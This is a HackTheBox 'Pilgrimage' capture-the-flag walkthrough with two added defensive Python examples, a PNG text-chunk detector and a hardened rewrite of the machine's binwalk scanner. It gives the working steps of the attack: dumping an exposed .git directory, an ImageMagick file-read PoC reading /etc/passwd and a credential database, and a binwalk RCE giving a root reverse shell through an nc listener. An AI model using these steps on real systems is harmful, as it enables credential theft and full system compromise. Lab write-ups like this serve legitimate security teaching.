Pilgrimage HTB Writeup
Hey Everyone !!
In this writeup we are going to PWN Pilgrimage, an easy machine from HackTheBox.
First we connect to the HTB VPN and then join the machine to get its IP address.

The IP address of the machine is 10.10.11.219. Next, check connectivity to the machine using ping:
ping -c 4 10.10.11.219

Enumeration
We start the enumeration with an nmap scan of the target to find the open ports and the services running on them:
nmap -sVC 10.10.11.219
Here are the results of the nmap scan:

From the results we find two exposed services:
- SSH on port 22
- HTTP on port 80
We also find an exposed “.git” directory, which likely contains the source of the web application.
HTTP Enumeration
We can recover the contents of the /.git/ directory using the tool git-dumper.
Installing git-dumper
git clone https://github.com/arthaud/git-dumper
cd git-dumper
pip install -r requirements.txt
Using git-dumper
python3 git_dumper.py http://pilgrimage.htb/.git/ git

Listing the dumped directory shows the following:

Analyzing the website, we see that it offers an image-shrinking function; after shrinking an image it saves the result under the /shrunk path.
Looking at the code, we see that it uses the magick convert command to shrink the image.

So, searching for an exploit for magick, I found this:
https://github.com/Sybil-Scan/imagemagick-lfi-poc
ImageMagick is vulnerable to “Arbitrary File Read”, which allows an attacker to read files on the system.
git clone https://github.com/Sybil-Scan/imagemagick-lfi-poc.git
Using the Exploit:
python3 generate.py -f "/etc/passwd" -o exploit.png
This generates a PNG file, exploit.png, which on upload lets us read arbitrary system files.
This is the link we get after shrinking:
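From the defender's side, the place to catch this is the upload handler, before the image ever reaches magick convert. The PoC linked above embeds the path of the file to read in a PNG text chunk (stated here as an assumption about the PoC, not something the writeup spells out). The following Python script is an added example, not part of the writeup or of the PoC, that walks a PNG's chunk list, verifies each chunk's CRC, and reports any tEXt/zTXt/iTXt chunk whose value looks like an absolute filesystem path. The sample_png helper only builds a constructed 1x1 test image so the script can be run offline.

```python
import struct
import sys
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"
TEXT_CHUNKS = {b"tEXt", b"zTXt", b"iTXt"}


def iter_chunks(data):
    """Yield (type, payload) for every chunk; reject a bad signature, short chunk or bad CRC."""
    if not data.startswith(PNG_SIGNATURE):
        raise ValueError("not a PNG file")
    pos = len(PNG_SIGNATURE)
    while pos + 12 <= len(data):
        (length,) = struct.unpack(">I", data[pos:pos + 4])
        ctype = data[pos + 4:pos + 8]
        payload = data[pos + 8:pos + 8 + length]
        (crc,) = struct.unpack(">I", data[pos + 8 + length:pos + 12 + length])
        if len(payload) != length or (zlib.crc32(ctype + payload) & 0xFFFFFFFF) != crc:
            raise ValueError("corrupt chunk %r" % ctype)
        yield ctype, payload
        pos += 12 + length
        if ctype == b"IEND":
            break


def text_chunk_fields(ctype, payload):
    """Return (keyword, text) for a tEXt, zTXt or iTXt chunk."""
    keyword, _, rest = payload.partition(b"\x00")
    if ctype == b"tEXt":
        text = rest
    elif ctype == b"zTXt":
        text = zlib.decompress(rest[1:])  # one compression-method byte, then zlib data
    else:  # iTXt: compression flag, method, language tag, translated keyword, text
        comp_flag = rest[0]
        rest = rest[2:]
        _lang, _, rest = rest.partition(b"\x00")
        _translated, _, text = rest.partition(b"\x00")
        if comp_flag == 1:
            text = zlib.decompress(text)
    return keyword.decode("latin-1"), text.decode("utf-8", "replace")


def suspicious_text_chunks(data):
    """Return [(chunk_type, keyword, text)] for text chunks whose value is an absolute path."""
    hits = []
    for ctype, payload in iter_chunks(data):
        if ctype in TEXT_CHUNKS:
            keyword, text = text_chunk_fields(ctype, payload)
            if text.startswith("/"):  # a metadata field has no business naming a file
                hits.append((ctype.decode("ascii"), keyword, text))
    return hits


def make_chunk(ctype, payload):
    """Serialize one chunk with its CRC (used only to construct test images)."""
    crc = zlib.crc32(ctype + payload) & 0xFFFFFFFF
    return struct.pack(">I", len(payload)) + ctype + payload + struct.pack(">I", crc)


def sample_png(text_chunks):
    """Constructed 1x1 grayscale PNG carrying the given (type, keyword, text) chunks."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)
    body = PNG_SIGNATURE + make_chunk(b"IHDR", ihdr)
    for ctype, keyword, text in text_chunks:
        if ctype == b"zTXt":
            body += make_chunk(ctype, keyword + b"\x00\x00" + zlib.compress(text))
        else:
            body += make_chunk(ctype, keyword + b"\x00" + text)
    body += make_chunk(b"IDAT", zlib.compress(b"\x00\x00"))  # filter byte + one pixel
    body += make_chunk(b"IEND", b"")
    return body


if __name__ == "__main__":
    with open(sys.argv[1], "rb") as handle:
        for hit in suspicious_text_chunks(handle.read()):
            print("suspicious %s chunk %r -> %r" % hit)
```

Run it as `python3 png_text_chunks.py upload.png` on each file the shrink form receives; a non-empty result is a reason to reject the upload before any converter touches it. Verifying the CRC matters because a truncated or hand-edited chunk should fail closed rather than be silently skipped.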

You can download the file using wget:

Now, as the exploit instructs, we run:
identify -verbose 64a26fb042e41.png

We get the file contents in hex form, which we decode back to plain text:

As we can see, the user is emily. To log in as that user we need the password; on analyzing the dashboard.php file we found an SQLite database:

Let's try to read this file using the same exploit:
python3 generate.py -f "/var/db/pilgrimage" -o exploit2.png
We get a very large hex string; on decoding it we can see:

We have the username and the password, so now we can connect as the user emily.

We have access as the user emily!!
We can collect the flag from user.txt.
Now let's go for root.
Using the ps command we find that root is executing a script named “malwarescan.sh”.
The bash script monitors the directory /var/www/pilgrimage.htb/shrunk/ for newly created files and analyzes them for unwanted content using binwalk:
#!/bin/bash
# Signatures that cause a new file to be deleted
blacklist=("Executable script" "Microsoft executable")
# Watch the shrunk/ directory and handle every CREATE event
/usr/bin/inotifywait -m -e create /var/www/pilgrimage.htb/shrunk/ | while read FILE; do
    # Rebuild the full path from the last inotifywait line ("<dir> CREATE <name>")
    filename="/var/www/pilgrimage.htb/shrunk/$(/usr/bin/echo "$FILE" | /usr/bin/tail -n 1 | /usr/bin/sed -n -e 's/^.*CREATE //p')"
    # Run binwalk with extraction (-e) and keep its output for the check below
    binout="$(/usr/local/bin/binwalk -e "$filename")"
    for banned in "${blacklist[@]}"; do
        if [[ "$binout" == *"$banned"* ]]; then
            /usr/bin/rm "$filename"
            break
        fi
    done
done
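The weak points of this script are that it runs as root, that it hands every new file to binwalk with -e (full extraction, far more code than a signature check needs), and that it builds the path from an unvalidated inotify line. The following Python rewrite is an added example, not the machine's script and not a replacement endorsed by binwalk's authors, that keeps the same blacklist decision but validates the basename, drops to an unprivileged account (SCAN_USER is a hypothetical name; the account must exist on the host), and runs binwalk without -e and with a timeout. The binwalk and inotifywait calls sit in their own functions so the decision logic can be exercised without either tool installed.

```python
import os
import pwd
import re
import subprocess

SHRUNK_DIR = "/var/www/pilgrimage.htb/shrunk"  # directory watched by the original script
BLACKLIST = ("Executable script", "Microsoft executable")  # same banned signatures
SCAN_USER = "binwalk-scan"  # hypothetical unprivileged account for running binwalk
SAFE_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,127}$")


def safe_filename(name):
    """Accept only a plain basename: no slashes, spaces, newlines or leading dots."""
    return bool(SAFE_NAME.match(name))


def is_banned(binout, blacklist=BLACKLIST):
    """Same decision as the original [[ "$binout" == *"$banned"* ]] loop."""
    return any(banned in binout for banned in blacklist)


def demote_to(user):
    """Build a preexec_fn that drops root privileges before binwalk starts."""
    pw = pwd.getpwnam(user)

    def _demote():
        os.setgroups([])
        os.setgid(pw.pw_gid)
        os.setuid(pw.pw_uid)

    return _demote


def run_binwalk(path, user=SCAN_USER):
    """Signature scan only (no -e), as an unprivileged user, with a timeout."""
    proc = subprocess.run(
        ["/usr/local/bin/binwalk", "--", path],
        capture_output=True, text=True, timeout=60,
        preexec_fn=demote_to(user),
    )
    return proc.stdout


def scan_new_file(name, runner=run_binwalk, remove=os.remove):
    """Return 'rejected', 'removed' or 'kept' for a file created in SHRUNK_DIR."""
    if not safe_filename(name):
        return "rejected"  # never build a path from an unvalidated inotify line
    path = os.path.join(SHRUNK_DIR, name)
    if is_banned(runner(path)):
        remove(path)
        return "removed"
    return "kept"


def watch(directory=SHRUNK_DIR):
    """Drive scan_new_file from inotifywait, one basename per line (--format '%f')."""
    cmd = ["/usr/bin/inotifywait", "-m", "-e", "create", "--format", "%f", "--", directory]
    with subprocess.Popen(cmd, stdout=subprocess.PIPE, text=True) as proc:
        for line in proc.stdout:
            name = line.rstrip("\n")
            print(name, scan_new_file(name))


if __name__ == "__main__":
    watch()
```

Even with these changes the scanner still parses attacker-controlled bytes, so the privilege drop is the part that matters most: a bug in the parser should cost the SCAN_USER account, not root. Pinning binwalk to a patched release is the other half of the fix.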
The version of binwalk found is 2.3.2, so we look for an exploit for it.
After researching on Google for a while, I found
It is vulnerable to Remote Command Execution.
Using the code from the above link, create exploit.py:
usage: exploit.py [-h] file ip port

Now we get an image, binwalk_exploit.png, that we have to place in the directory the script monitors.
Now we open a listener using:
nc -lvnp 6969
To transfer the exploit image to the emily session we can use Python's HTTP server:
python3 -m http.server PORT
Run the above command in the directory where the image is present.
Now download it as user emily with:
wget http://[YOUR IP]:PORT/binwalk_exploit.png

Now copy binwalk_exploit.png to /var/www/pilgrimage.htb/shrunk/.
After copying, the listener receives a connection.

And Congratulations!!! We are Root
